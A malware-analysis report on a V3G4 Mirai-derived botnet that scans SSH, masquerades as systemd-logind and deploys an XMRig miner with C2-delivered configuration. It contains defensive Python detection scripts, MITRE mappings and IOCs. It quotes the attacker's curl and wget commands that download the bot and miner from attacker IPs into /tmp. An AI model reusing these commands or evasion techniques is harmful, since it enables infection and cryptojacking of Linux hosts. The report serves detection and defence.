    V3G4 Mirai Botnet Evolves

By Declan Murphy, December 19, 2025

CRIL has uncovered an active V3G4 campaign using a Mirai-derived botnet alongside a fileless, runtime-configured cryptominer.

Executive Summary

Cyble Research & Intelligence Labs (CRIL) has identified an active Linux-targeting campaign that deploys a Mirai-derived botnet paired with a stealthy, fileless-configured cryptominer.

The threat actor employs a multi-stage infection chain that starts with a downloader delivering architecture-specific V3G4 binaries for x86_64, ARM, and MIPS systems. Once active, the bot masquerades as systemd-logind, performs environment reconnaissance, conducts large-scale raw-socket SSH scanning, maintains persistent C2 communication, and ultimately launches a concealed XMRig-based Monero miner that is configured dynamically at runtime.

This activity reflects the continued evolution of Mirai-lineage threats, which increasingly combine DDoS capabilities with covert cryptomining. Fileless configuration, packed binaries, tmpfs staging, and aggressive scanning techniques highlight the actor's focus on evasion and monetization across cloud and Internet-exposed Linux environments.

This report provides a breakdown of the execution chain, reconnaissance behavior, stealth mechanisms, botnet communication, cryptominer deployment workflow, MITRE TTPs, and IOCs identified during the investigation.

    Key Takeaways

• Multi-Stage Infection Chain: Attackers deployed a shell script (named "Universal Bot Downloader") that automatically identifies the system architecture and downloads the matching bot binary.
• Mirai-Lineage Botnet: The core payload exhibits behavioral patterns consistent with V3G4/Mirai forks, including SSH scanning, IP spoofing, and DDoS capabilities.
• Stealth and Evasion: The bot masquerades as systemd-logind, detaches from the TTY, suppresses output, and uses a localhost TCP socket for internal IPC.
• Raw TCP Scanning: High-speed SYN packet spraying at port 22 is used for SSH brute-force propagation across the Internet.
• DNS-Based C2 Lookup: Multi-threaded DNS queries to 8.8.8.8 resolve the C2 domain baojunwakuang[.]asia, which maps to 159.75.47[.]123.
• Cryptominer Deployment: The malware downloads an XMRig miner disguised as .dbus-daemon into /tmp and receives its mining configuration dynamically from the C2 server.
• Fileless Configuration: Miner parameters, including wallet address, pool, and algorithm, are delivered at runtime, avoiding on-disk artifacts and hindering forensic analysis.

    Overview

This campaign employs a streamlined infection workflow designed for broad compatibility across Linux environments. The first-stage downloader (the Universal Bot Downloader) exhibits classic Mirai-style behavior: it identifies the system architecture with uname -m and constructs a tailored download path for the corresponding bot binary hosted at 103.149.93[.]224.

The payload is written into /tmp, given executable permissions, and executed immediately, a classic tactic in IoT and cloud-targeting botnets. Figure 1 below shows the HTTP server hosting the malicious binaries.

Figure 1 – Open directory on HTTP server

The second stage, Mddos.x86_64, is a statically linked, UPX-packed ELF file with stripped symbols, which makes static inspection more difficult. Upon execution, the bot gathers system information, initializes random seeds for timing variability, and prints a signature banner strongly associated with V3G4/Mirai-derived strains.

The malware then transitions into stealth mode: it renames its process to appear as a system daemon (systemd-logind), detaches from the terminal, and launches multiple worker threads responsible for attack operations, C2 communication, and IPC coordination.

It uses multiple worker threads to execute attack logic in parallel, with non-blocking I/O and pselect(2) used to manage concurrent network operations.

A key characteristic of this botnet variant is its use of raw TCP sockets, which allow precise crafting of SYN packets for high-velocity SSH scanning campaigns. In parallel, multiple worker threads aggressively resolve the C2 domain (www.baojunwakuang[.]asia) through repeated queries to Google Public DNS (8.8.8.8) to maintain resilient command channels.

Finally, the third stage deploys a covert cryptominer. The loader fetches a UPX-packed XMRig binary from 159.75.47[.]123 and stores it at /tmp/.dbus-daemon to blend in with legitimate processes. Instead of shipping a local configuration file, the miner fetches its configuration dynamically from the C2 server, enabling real-time updates to wallet addresses, mining pools, and algorithms while leaving no on-disk artifacts.

Our analysis confirms:

• A Mirai-style botnet delivered through a custom loader
• Raw TCP SSH scanning from infected hosts
• Dynamic, C2-delivered miner configuration
• Process masquerading for stealth
• Use of tmpfs for staging and execution

Technical Analysis

Stage-1: Universal Bot Downloader Script

The campaign begins with a compact shell script responsible for fetching the Mirai-derived botnet payload from an attacker-controlled server at 103.149.93[.]224.

It first identifies the CPU architecture of the target system with uname -m and maps it to one of several supported builds of the bot binary (targeting Linux devices with x86_64, arm64, arm7, arm5, mips, and mipsel CPUs).

It then builds a download URL, fetches the matching bot binary into the /tmp directory, assigns executable permissions, and runs it. This is consistent with botnets that deploy architecture-specific payloads for propagation. (See Figure 2)

Figure 2 – Universal Bot Downloader script

Below is the curl command used for devices running on the x86_64 architecture.

curl -o Mddos.x86_64 http://103.149.93[.]224/bins/Mddos.x86_64

Stage-2: Mddos.x86_64 Bot

The bot binary is a UPX-packed, statically linked ELF with stripped symbols and embedded custom routines and wrappers, which complicates static analysis. (See Figure 3)

Figure 3 – File attributes
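The file traits just described (UPX packing, static linking, a stripped section table) plus the Stage-1 architecture mapping can be checked with a few header fields. The script below is an added example written for this page, not Cyble's tooling; the ELF images it builds in make_sample_elf() are constructed test data, not the real samples, and the "UPX!" string check is a heuristic that a modified packer can trivially defeat. Only little-endian ELF64 is handled; the arm7/arm5/mips/mipsel builds are ELF32 and would need the 32-bit layout.

```python
"""Triage an ELF for the traits of the Mddos/xmrig samples: UPX marker,
no PT_INTERP (static), no section headers (stripped by the packer).
Added example; the sample images are constructed, not the real binaries."""
import struct
import sys

EI_CLASS_64 = 2
PT_LOAD, PT_INTERP = 1, 3
ET_EXEC = 2
# e_machine values from the ELF spec, named the way the downloader names its builds.
MACHINE_TO_ARCH = {62: "x86_64", 183: "arm64", 40: "arm", 8: "mips"}


def triage_elf(data: bytes) -> dict:
    """Return packing/linking/stripping indicators for a little-endian ELF64 image."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != EI_CLASS_64:
        raise ValueError("only ELF64 is handled in this example")
    # After the 16-byte e_ident: type, machine, version, entry, phoff, shoff,
    # flags, ehsize, phentsize, phnum, shentsize, shnum, shstrndx (64 bytes total).
    (e_type, e_machine, _ver, _entry, e_phoff, e_shoff, _flags, _ehsize,
     e_phentsize, e_phnum, _shentsize, e_shnum, _shstrndx) = struct.unpack_from(
        "<HHIQQQIHHHHHH", data, 16)
    has_interp = any(
        struct.unpack_from("<I", data, e_phoff + i * e_phentsize)[0] == PT_INTERP
        for i in range(e_phnum))
    return {
        "arch": MACHINE_TO_ARCH.get(e_machine, f"unknown({e_machine})"),
        "executable": e_type == ET_EXEC,
        "static": not has_interp,                  # no PT_INTERP => no dynamic loader
        "stripped": e_shnum == 0 or e_shoff == 0,  # UPX drops the section table entirely
        "upx_marker": b"UPX!" in data,             # heuristic only
    }


def is_suspicious(report: dict) -> bool:
    """The combination the report describes: packed, static, no section headers."""
    return report["upx_marker"] and report["static"] and report["stripped"]


def make_sample_elf(machine: int, packed: bool) -> bytes:
    """Constructed, non-runnable ELF64 image for testing (not a real sample).
    packed=True mimics UPX output: one PT_LOAD, no PT_INTERP, no sections, 'UPX!' trailer.
    packed=False mimics a normal dynamic binary: PT_INTERP present, three sections."""
    ehsize, phentsize, shentsize = 64, 56, 64
    phdrs = [PT_LOAD] if packed else [PT_LOAD, PT_INTERP]
    shnum = 0 if packed else 3
    shoff = 0 if packed else ehsize + phentsize * len(phdrs)
    img = b"\x7fELF" + bytes([EI_CLASS_64, 1, 1, 0]) + b"\x00" * 8
    img += struct.pack("<HHIQQQIHHHHHH", ET_EXEC, machine, 1, 0x400000, ehsize, shoff,
                       0, ehsize, phentsize, len(phdrs), shentsize, shnum, 0)
    for p_type in phdrs:  # p_type, p_flags, offset, vaddr, paddr, filesz, memsz, align
        img += struct.pack("<IIQQQQQQ", p_type, 5, 0, 0x400000, 0x400000, 0, 0, 0x1000)
    img += b"\x00" * shentsize * shnum
    return img + (b"UPX!" if packed else b"")


if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            report = triage_elf(fh.read())
        print(path, report, "SUSPICIOUS" if is_suspicious(report) else "")
```

Run it as `python3 elf_triage.py /tmp/Mddos.x86_64 /tmp/.dbus-daemon` on a suspect host; a clean distribution binary will normally report static=False and stripped=False even when its symbols have been stripped, because only the packer removes the section table.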

Environment & Reconnaissance

The malware begins by gathering basic information about the victim, including kernel and architecture details via uname(2), and checks the host's process limits to determine how aggressively it can operate. The system information is later used to register the victim machine with the C2 server. (See Figure 4)

Figure 4 – Environment reconnaissance

It also identifies its own executable path and initializes a random seed, which is commonly used to randomize network activity or timing patterns. After initialization, it prints a signature banner (xXxSlicexXxxVEGA.) to STDOUT, matching the behavioral patterns of V3G4, a Mirai-lineage botnet previously documented by Palo Alto Networks Unit 42 in 2023 and observed in recent cloud infections.

Stealth Mechanism

Once initialized, the malware shifts into stealth mode. It masquerades as a system daemon ("systemd-logind") using prctl(2) with PR_SET_NAME, which changes the name shown in /proc/<pid>/comm, and also attempts to modify /proc/self/cmdline. Although that write fails because of kernel protections, the intent resembles stealth techniques widely used in Mirai forks. The practical result is that /proc/<pid>/comm reads systemd-logind while /proc/<pid>/cmdline and the /proc/<pid>/exe link still reveal the original binary in /tmp, a mismatch defenders can look for. (See Figure 5)

Figure 5 – Masquerading command line and process name

This is an attempt to deceive process-inspection tools by appearing as a legitimate system service, helping it blend into process lists. To further conceal its activity, the malware detaches from any controlling terminal using the setsid(2) system call and closes the standard input/output streams, allowing it to run silently in the background without user visibility.

It then spawns multiple worker threads responsible for attack operations, watchdog supervision, and communication with its command-and-control server. The main thread initializes a TCP listener on 127.0.0.1:63841, which functions as an internal inter-process communication (IPC) channel used to coordinate its worker threads and helper processes.

Using localhost TCP traffic helps the malware blend in with legitimate system daemons and desktop applications, making the activity far less suspicious than pipes, shared memory, or other IPC methods that might trigger security monitoring or policy restrictions. (See Figure 6)

Figure 6 – Mddos.x86_64 bot masquerading as systemd-logind, listening on port 63841
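Both host artifacts from this section, the renamed process and the loopback IPC listener, can be hunted from /proc. The script below is an added example for this page, not Cyble's tooling. The /proc/net/tcp rows and process records embedded in it are constructed sample data shaped like what the report describes (a real systemd-logind and a /tmp/Mddos.x86_64 renamed to the same comm); the legitimate systemd-logind paths are an assumed allowlist that should be adjusted to the distribution in use. With --live it walks the real /proc on a Linux host.

```python
"""Hunt for a process whose comm was renamed with prctl(PR_SET_NAME) while
argv[0]/exe still point at the real binary, and for a loopback listener on
the bot's IPC port. Added example; sample data below is constructed."""
import os
import sys

# Assumed allowlist; systemd's real path differs by distribution.
LEGIT_LOGIND_EXE = {"/usr/lib/systemd/systemd-logind", "/lib/systemd/systemd-logind"}
IPC_PORT = 63841
TCP_LISTEN = "0A"  # 'st' column value for LISTEN in /proc/net/tcp


def hex_to_ipv4(h: str) -> str:
    """/proc/net/tcp stores IPv4 as little-endian hex: 0100007F == 127.0.0.1."""
    return ".".join(str(b) for b in bytes.fromhex(h)[::-1])


def parse_proc_net_tcp(text: str):
    """Yield (local_ip, local_port, state, inode) per socket row, skipping the header."""
    for row in text.strip().splitlines()[1:]:
        f = row.split()
        ip_hex, port_hex = f[1].split(":")
        yield hex_to_ipv4(ip_hex), int(port_hex, 16), f[3], int(f[9])


def find_ipc_listener(text: str, port: int = IPC_PORT):
    """Return the socket inode of a loopback listener on `port`, or None."""
    for ip, lport, state, inode in parse_proc_net_tcp(text):
        if lport == port and state == TCP_LISTEN and ip.startswith("127."):
            return inode
    return None


def masquerade_findings(comm: str, cmdline: list, exe: str) -> list:
    """PR_SET_NAME rewrites comm only, so comm vs argv[0]/exe mismatches are the tell.
    comm is truncated to 15 chars by the kernel, hence the startswith() check."""
    findings = []
    if comm == "systemd-logind" and exe not in LEGIT_LOGIND_EXE:
        findings.append(f"comm=systemd-logind but exe={exe}")
    argv0 = os.path.basename(cmdline[0]) if cmdline else ""
    if argv0 and argv0 != comm and not argv0.startswith(comm):
        findings.append(f"comm={comm!r} does not match argv[0]={argv0!r}")
    if exe.startswith(("/tmp/", "/dev/shm/", "/var/tmp/")) or exe.endswith(" (deleted)"):
        findings.append(f"exe in tmpfs or deleted: {exe}")
    return findings


def read_live_processes():
    """Walk /proc on a real Linux host; needs root to read other users' exe links."""
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/comm") as fh:
                comm = fh.read().strip()
            with open(f"/proc/{pid}/cmdline", "rb") as fh:
                cmdline = [a.decode(errors="replace") for a in fh.read().split(b"\0") if a]
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            continue  # kernel thread, exited, or no permission
        yield int(pid), comm, cmdline, exe


def hunt(processes, proc_net_tcp: str) -> dict:
    """Combine both checks: listener inode plus per-pid masquerading findings."""
    report = {"listener_inode": find_ipc_listener(proc_net_tcp), "masquerading": {}}
    for pid, comm, cmdline, exe in processes:
        hits = masquerade_findings(comm, cmdline, exe)
        if hits:
            report["masquerading"][pid] = hits
    return report


# Constructed sample data mirroring the report's host view; not real captures.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:F961 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 31337 1 0000000000000000 100 0 0 10 0
   1: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 20001 1 0000000000000000 100 0 0 10 0
"""
SAMPLE_PROCESSES = [
    (821, "systemd-logind", ["/usr/lib/systemd/systemd-logind"], "/usr/lib/systemd/systemd-logind"),
    (4242, "systemd-logind", ["/tmp/Mddos.x86_64"], "/tmp/Mddos.x86_64"),
]

if __name__ == "__main__":
    if "--live" in sys.argv:
        with open("/proc/net/tcp") as fh:
            print(hunt(read_live_processes(), fh.read()))
    else:
        print(hunt(SAMPLE_PROCESSES, SAMPLE_PROC_NET_TCP))
```

The listener inode returned can be matched to a pid via /proc/<pid>/fd/* symlinks of the form socket:[inode], which ties the 127.0.0.1:63841 socket back to the renamed process even if the bot later changes its name again.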

Botnet Communication & Scanning

Raw TCP Socket

The process actively performs high-speed SSH scanning across the Internet. Specifically, the malware opens raw TCP sockets to spray SYN packets at port 22 on numerous target IP addresses. The IPv4 packet headers suggest manually crafted packets (each begins with ASCII E / 0x45, i.e., IPv4 with a 20-byte header), and hundreds of 40-byte packets (a 20-byte IP header plus a 20-byte TCP header, with no options or payload) are transmitted in rapid succession, indicating automated scanning and potential brute-force activity.

This behavior closely matches that of Mirai-derived botnet families, which are known for conducting Internet-wide SSH scanning campaigns. (See Figure 7)

Figure 7 – TCP SYN packets flooding the SSH port
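The 40-byte, 0x45-prefixed SYN profile described above is easy to match on the wire. The script below is an added example written for this page, not Cyble's tooling: it decodes a raw IPv4/TCP header and flags any source that sends bare SYNs to port 22 across many distinct destinations. The packets it analyses are constructed by build_syn() purely as test input and are never transmitted; the addresses are documentation ranges and the 20-destination threshold is an assumed tuning value. For real traffic, pass the IP-layer bytes of each frame (for example from a pcap reader) to detect_syn_spray().

```python
"""Detect SYN spraying at port 22 from raw IPv4/TCP headers.
Added example; test packets are constructed locally, never sent."""
import ipaddress
import struct
from collections import defaultdict

TCP_SYN, TCP_ACK = 0x02, 0x10


def parse_ipv4_tcp(pkt: bytes) -> dict:
    """Decode IPv4 + TCP headers; raise ValueError for anything else."""
    if len(pkt) < 40 or pkt[0] >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    ihl = (pkt[0] & 0x0F) * 4              # 0x45 => version 4, IHL 5 => 20-byte header
    total_len = struct.unpack_from("!H", pkt, 2)[0]
    if pkt[9] != 6:
        raise ValueError("not TCP")
    sport, dport, _seq, _ack, off_flags = struct.unpack_from("!HHIIH", pkt, ihl)
    data_off = (off_flags >> 12) * 4
    flags = off_flags & 0x1FF
    return {
        "src": str(ipaddress.IPv4Address(pkt[12:16])),
        "dst": str(ipaddress.IPv4Address(pkt[16:20])),
        "sport": sport, "dport": dport, "flags": flags, "total_len": total_len,
        # SYN only, no options, no payload: the 40-byte scanner profile
        "bare_syn": flags == TCP_SYN and total_len == ihl + data_off,
    }


def detect_syn_spray(packets, dport: int = 22, min_targets: int = 20) -> dict:
    """Return {src: distinct destinations} for sources sending >= min_targets
    bare 40-byte SYNs to dport. Non-IPv4/TCP input is skipped."""
    targets = defaultdict(set)
    for pkt in packets:
        try:
            p = parse_ipv4_tcp(pkt)
        except ValueError:
            continue
        if p["dport"] == dport and p["bare_syn"] and p["total_len"] == 40:
            targets[p["src"]].add(p["dst"])
    return {src: len(d) for src, d in targets.items() if len(d) >= min_targets}


def ip_checksum(hdr: bytes) -> int:
    """One's-complement sum over the 20-byte IPv4 header; 0 when verifying a valid header."""
    s = sum(struct.unpack("!10H", hdr))
    while s >> 16:
        s = (s & 0xFFFF) + (s >> 16)
    return (~s) & 0xFFFF


def build_syn(src: str, dst: str, sport: int, dport: int = 22, flags: int = TCP_SYN) -> bytes:
    """Constructed test packet: minimal IPv4 + TCP headers, no options, no payload.
    The TCP checksum is left zero; only the IP checksum is filled in."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0x1234, 0, 64, 6, 0,
                     ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    ip = ip[:10] + struct.pack("!H", ip_checksum(ip)) + ip[12:]
    tcp = struct.pack("!HHIIHHHH", sport, dport, 0, 0, (5 << 12) | flags, 1024, 0, 0)
    return ip + tcp


def sample_traffic() -> list:
    """Constructed capture: one host spraying a /24 on port 22, one normal SSH
    SYN followed by its ACK, and one HTTPS SYN. Documentation addresses only."""
    pkts = [build_syn("203.0.113.7", f"198.51.100.{i}", 40000 + i) for i in range(1, 61)]
    pkts.append(build_syn("192.0.2.10", "198.51.100.5", 51515, 22, TCP_SYN))
    pkts.append(build_syn("192.0.2.10", "198.51.100.5", 51515, 22, TCP_ACK))
    pkts.append(build_syn("192.0.2.11", "198.51.100.9", 51516, 443))
    return pkts


if __name__ == "__main__":
    print(detect_syn_spray(sample_traffic()))
```

Counting distinct destinations rather than raw packet volume is what separates a scanner from a busy but legitimate client: the normal SSH client above reaches one host and is ignored, while the scanner touches sixty and is reported.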

C2 DNS Resolution

In addition to raw sockets, the malware creates standard TCP sockets configured with keepalive options, allowing persistent connections to command-and-control (C2) infrastructure.

Concurrently, it spawns multiple worker threads that each perform DNS queries against 8.8.8.8 to resolve its C2 server (www.baojunwakuang[.]asia, resolving to 159.75.47[.]123).

This multi-threaded DNS resolution strategy is typical of Mirai-style bots and allows the malware to maintain connectivity and receive commands while executing attacks in parallel. (See Figure 8)

Figure 8 – DNS query

Overall, the combination of raw packet generation, high-speed port 22 targeting, and aggressive C2 resolution strongly indicates that this malware functions as a Mirai-derived SSH scanning and DDoS bot, capable of rapidly identifying vulnerable hosts and coordinating network attacks.

Stage 3: Cryptominer Deployment & Fileless Configuration

The malware includes a dedicated cryptomining stage that retrieves and executes an XMRig-based Monero miner named xmrig.x86_64. The operator employs several stealth techniques, including dynamic (fileless) miner configuration and the use of a packed, stripped binary to hinder static analysis.

Miner Delivery

Upon execution, the botnet loader forms a download URL and uses wget to fetch a pre-compiled XMRig miner binary from the attacker-controlled server. The binary is dropped in the tmp filesystem, disguised as dbus-daemon. (See Figure 9)

Figure 9 – URL construction to download the XMRig miner from the C2 server

The wget command formed is shown below:

wget -q -O /tmp/.dbus-daemon http://159.75.47[.]123/bins/xmrig.x86_64 2>/dev/null

The downloaded payload is:

• UPX-packed, significantly reducing the visible code surface.
• Stripped, removing symbol information to thwart reverse engineering.
• Temporarily stored under a masqueraded path (/tmp/.dbus-daemon) to blend in with legitimate system files.

Fileless, C2-Provided Miner Configuration

Unlike typical miner deployments that embed a static configuration file on disk (config.json, YAML, etc.), this sample requests its runtime configuration directly from the C2 server. This approach allows the operator to:

• Avoid exposing wallet addresses, pool endpoints, or algorithms to static analysis
• Dynamically rotate mining parameters
• Prevent visibility of miner settings on the infected host

During execution, the miner connects back to the same C2 (159.75.47[.]123) and issues a configuration request. The server responds with a JSON blob containing the pool URL, wallet address, algorithm, and thread count. Refer to Figure 10 below for the configuration captured during the analysis.

Figure 10 – Captured cryptominer configuration

Figure 11 below shows the extracted configuration data in readable form:

Figure 11 – Extracted cryptominer configuration
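Because the configuration never touches disk, the place to recover it is the C2 response on the wire or the miner's memory. The script below is an added example for this page, not Cyble's tooling: it carves the first JSON object out of a captured HTTP body (or a memory dump string) and extracts the pool, wallet, algorithm and thread hint. The JSON layout it expects is XMRig's own config schema ("pools" with "url"/"user", top-level "algo", "cpu.max-threads-hint"); whether this C2 uses exactly that schema is an assumption, and the captured data in Figures 10 and 11 is not reproduced here. The embedded response is constructed: only the pool and wallet values come from the report's IOC table, and the algorithm and thread count are made up for the example.

```python
"""Carve and triage a runtime-delivered XMRig-style miner configuration.
Added example; SAMPLE_C2_RESPONSE is constructed, not the captured traffic."""
import json
import re

# Monero addresses are base58 (no 0, O, I, l); standard (4...) and subaddress (8...) are 95 chars.
B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
XMR_ADDRESS = re.compile(r"^[48][" + B58 + r"]{94}$")
# Assumed watchlist of public pools; extend from your own intel.
KNOWN_POOL_DOMAINS = ("c3pool.org", "supportxmr.com", "hashvault.pro", "nanopool.org")


def looks_like_xmr_wallet(value) -> bool:
    return isinstance(value, str) and XMR_ADDRESS.match(value) is not None


def is_known_pool(host: str) -> bool:
    return any(host == d or host.endswith("." + d) for d in KNOWN_POOL_DOMAINS)


def extract_json(body: str) -> dict:
    """Return the first JSON object found in an HTTP body or a memory carve.
    raw_decode() stops at the end of the object, so trailing bytes are fine."""
    start = body.find("{")
    if start < 0:
        raise ValueError("no JSON object in input")
    obj, _end = json.JSONDecoder().raw_decode(body[start:])
    return obj


def split_pool(url: str):
    """'stratum+tcp://host:port' or 'host:port' -> (host, port or None)."""
    hostport = url.split("://", 1)[-1].split("/", 1)[0]
    host, sep, port = hostport.rpartition(":")
    if not sep:
        return hostport, None
    return host, (int(port) if port.isdigit() else None)


def triage_miner_config(body: str) -> dict:
    """Summarise pools, wallet validity, algorithm and CPU hint from the config."""
    cfg = extract_json(body)
    raw_pools = cfg.get("pools", [])
    pools = []
    for pool in raw_pools:
        host, port = split_pool(pool.get("url", ""))
        pools.append({
            "host": host, "port": port,
            "wallet": pool.get("user", ""),
            "wallet_valid": looks_like_xmr_wallet(pool.get("user")),
            "known_pool": is_known_pool(host),
            "tls": bool(pool.get("tls", False)),
        })
    algo = cfg.get("algo") or next((p.get("algo") for p in raw_pools if p.get("algo")), None)
    cpu = cfg.get("cpu") if isinstance(cfg.get("cpu"), dict) else {}
    return {
        "algo": algo,
        "threads_hint": cpu.get("max-threads-hint"),
        "pools": pools,
        "verdict": any(p["wallet_valid"] or p["known_pool"] for p in pools),
    }


def iocs(report: dict) -> set:
    """Flatten the triage result into indicator strings for blocking or a watchlist."""
    out = set()
    for p in report["pools"]:
        out.add(f"{p['host']}:{p['port']}" if p["port"] else p["host"])
        if p["wallet_valid"]:
            out.add(p["wallet"])
    return out


# Constructed C2 response in XMRig config shape; pool and wallet are the report's
# IOCs, the algorithm and thread hint are invented for the example.
SAMPLE_C2_RESPONSE = (
    "HTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n"
    '{"algo": "rx/0", "cpu": {"enabled": true, "max-threads-hint": 50}, '
    '"pools": [{"url": "auto.c3pool.org:19999", '
    '"user": "4AAjsvwrMQxBJpExraeoqdKrV8bwz2kkJG7P4axGTSip46CjmCrvSa8dztbNC4n6XuLr8wiXYgxS9c979hpdmi6s3LCNNja", '
    '"pass": "x", "tls": false}]}'
)

if __name__ == "__main__":
    result = triage_miner_config(SAMPLE_C2_RESPONSE)
    print(result)
    print(sorted(iocs(result)))
```

The same function works on a string dumped from the miner's heap (for example the output of `strings` over /proc/<pid>/mem captured with gcore), which is the other place the configuration exists after the HTTP exchange is over.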

Conclusion

This campaign represents a sophisticated and financially motivated operation that combines botnet propagation with stealthy cryptomining. The attacker employs several advanced techniques, including raw-socket scanning, masqueraded processes, internal localhost IPC, dynamic DNS resolution, and fileless miner configuration, to evade detection and maintain long-term persistence on compromised devices.

The integration of Mirai-based DDoS capabilities with XMRig-based mining reflects the continued trend of hybrid monetization strategies, in which threat actors maximize ROI by leveraging infected devices not only for botnet attacks but also for illicit cryptocurrency mining.

Organizations running Linux servers, cloud workloads, or exposed IoT devices remain high-value targets and should prioritize hardening and continuous monitoring to mitigate their risk.

Cyble's Threat Intelligence Platforms continuously monitor emerging threats, phishing infrastructure, and malware activity across the dark web, deep web, and open sources. This proactive intelligence gives organizations early detection, brand and domain protection, infrastructure mapping, and attribution insights. Together, these capabilities provide a critical head start in mitigating and responding to evolving cyber threats.

Our Recommendations

We have listed some essential cybersecurity best practices that form the first line of control against attackers. We recommend that our readers follow the best practices given below:

1. Harden the External Attack Surface

• Disable password-based SSH authentication; enforce key-based access.
• Apply rate-limiting or geo-restrictions on SSH (port 22).
• Ensure unnecessary Internet-exposed services are closed.

2. Monitor for Anomalous Network Activity

• Detect raw TCP packet floods targeting port 22.
• Monitor for unusual outbound connections to suspicious IPs and domains.

3. Deploy File Integrity & Runtime Monitoring

• Alert on download + execution of binaries from /tmp or /dev/shm.
• Detect unusual process names such as systemd-logind originating from non-system paths.
• Monitor for UPX-packed ELF binaries on endpoints.

4. Strengthen Cloud and Linux Security Posture

• Enable SELinux/AppArmor enforcement.
• Restrict write/execute permissions on temporary filesystems (for example, mount /tmp and /dev/shm with noexec).
• Deploy EDR solutions capable of analyzing Linux process behavior.

5. Proactive Threat Hunting

• Hunt for evidence of XMRig execution.
• Search for traces of raw-socket creation or SYN-flood-like behavior.
• Inspect systems for masqueraded processes or hidden botnet listeners (e.g., 127.0.0.1:63841).

6. Patch and Update Regularly

• Ensure Linux kernels, SSH services, and IoT firmware remain up to date, closing vulnerabilities exploited by botnet operators.

MITRE ATT&CK® Techniques

Tactic | Technique (ID) | Procedure
Reconnaissance (TA0043) | Gather Victim Host Information (T1592)* | Collects system details (uname output, process limits, architecture, hostname) for C2 registration.
Resource Development (TA0042) | Acquire Infrastructure (T1583.003) | C2 and payload distribution servers hosted at 103.149.93[.]224 and 159.75.47[.]123.
Initial Access (TA0001) | Valid Accounts (T1078) | SSH brute-force attempts to obtain credentials and access additional Linux hosts.
Execution (TA0002) | Command and Scripting Interpreter: Unix Shell (T1059.004) | Downloader script uses curl/wget to fetch and execute the bot payload.
Execution (TA0002) | Native API (T1106) | Bot uses syscalls (setsid, prctl) for stealth.
Defense Evasion (TA0005) | Masquerading: Match Legitimate Name or Location (T1036.005) | Process renamed to appear as a legitimate system service (systemd-logind).
Defense Evasion (TA0005) | Obfuscated Files or Information (T1027) | Payloads are UPX-packed and stripped to complicate analysis.
Defense Evasion (TA0005) | Hide Artifacts: Hidden Files and Directories (T1564.001) | Miner dropped as /tmp/.dbus-daemon to blend in with legitimate files.
Discovery (TA0007) | System Network Configuration Discovery (T1016) / System Information Discovery (T1082) | Gathers kernel, architecture, process limits, and host identifiers.
Lateral Movement (TA0008) | Remote Services: SSH (T1021.004) | Uses SSH brute-force to move laterally across reachable systems.
Command and Control (TA0011) | Application Layer Protocol: DNS (T1071.004) | Multi-threaded DNS queries to 8.8.8.8 resolving www.baojunwakuang[.]asia → 159.75.47[.]123.
Command and Control (TA0011) | Non-Standard Port (T1571) | 159.75.47[.]123:60194 used to fetch the miner configuration; localhost TCP listener on 127.0.0.1:63841 for internal IPC.
Impact (TA0040) | Network Denial of Service (T1498) | Capable of launching DDoS attacks.
Impact (TA0040) | Resource Hijacking (T1496) | Deploys XMRig to consume CPU resources and mine Monero for financial gain.

Indicators of Compromise (IOCs)

Indicator | Type | Description
103.149.93[.]224 | IP address | HTTP server hosting bot binaries
159.75.47[.]123 | IP address | C2 IP
www[.]baojunwakuang[.]asia | Domain | C2 domain
hxxps://103.149.93[.]224/bins/Mddos.x86_64 | URL | Download URL for the x86_64 bot binary
hxxps://103.149.93[.]224/bins/Mddos.arm64 | URL | Download URL for the arm64 bot binary
hxxps://103.149.93[.]224/bins/Mddos.arm7 | URL | Download URL for the arm7 bot binary
hxxps://103.149.93[.]224/bins/Mddos.arm5 | URL | Download URL for the arm5 bot binary
hxxps://103.149.93[.]224/bins/Mddos.mips | URL | Download URL for the mips bot binary
hxxps://103.149.93[.]224/bins/Mddos.mpsl | URL | Download URL for the mpsl bot binary
hxxps://159.75.47[.]123/bins/xmrig.x86_64 | URL | Download URL for the cryptominer binary
auto.c3pool[.]org:19999 | Pool | Mining pool
4AAjsvwrMQxBJpExraeoqdKrV8bwz2kkJG7P4axGTSip46CjmCrvSa8dztbNC4n6XuLr8wiXYgxS9c979hpdmi6s3LCNNja | Wallet ID | Monero wallet
2c0261e6a3590e3554202116c5398637d0d7900895646d0aaf46d117aadd1612 | SHA256 | Mddos binary (ARM)
8350cd4e9b2f1056c8ccdf0d1b2406b32634840aa304d535ad4b6be5b365275c | SHA256 | Universal Bot Downloader script
d5c55f18b1a7c01d3e4fb657b00aa677784640fef3c1742243a65ded07aeccc6 | SHA256 | Mddos.x86_64
4ad4fe754acde2f79ced013d7dc7260e111ea23c7a47001e3fb16aa5d268852a | SHA256 | Mddos.x86_64
2e6fecefa3062d2306124e014643a14066981f4865dedbeffb8c1d057dc650b2 | SHA256 | Mddos.arm64
f838c2ec86c444d09956934948a28ff6459da7afe820682ead81e4a95deb703a | SHA256 | Mddos.arm7
39ead6055306739ab969a3531bde2050f556b05e500894b3cda120178f2773be | SHA256 | xmrig.x86_64
90e28c0d2f2ce83164c2bfdcf42a8746ff055b35b81c95d4b18639b1f2e96885 | SHA256 | xmrig.x86_64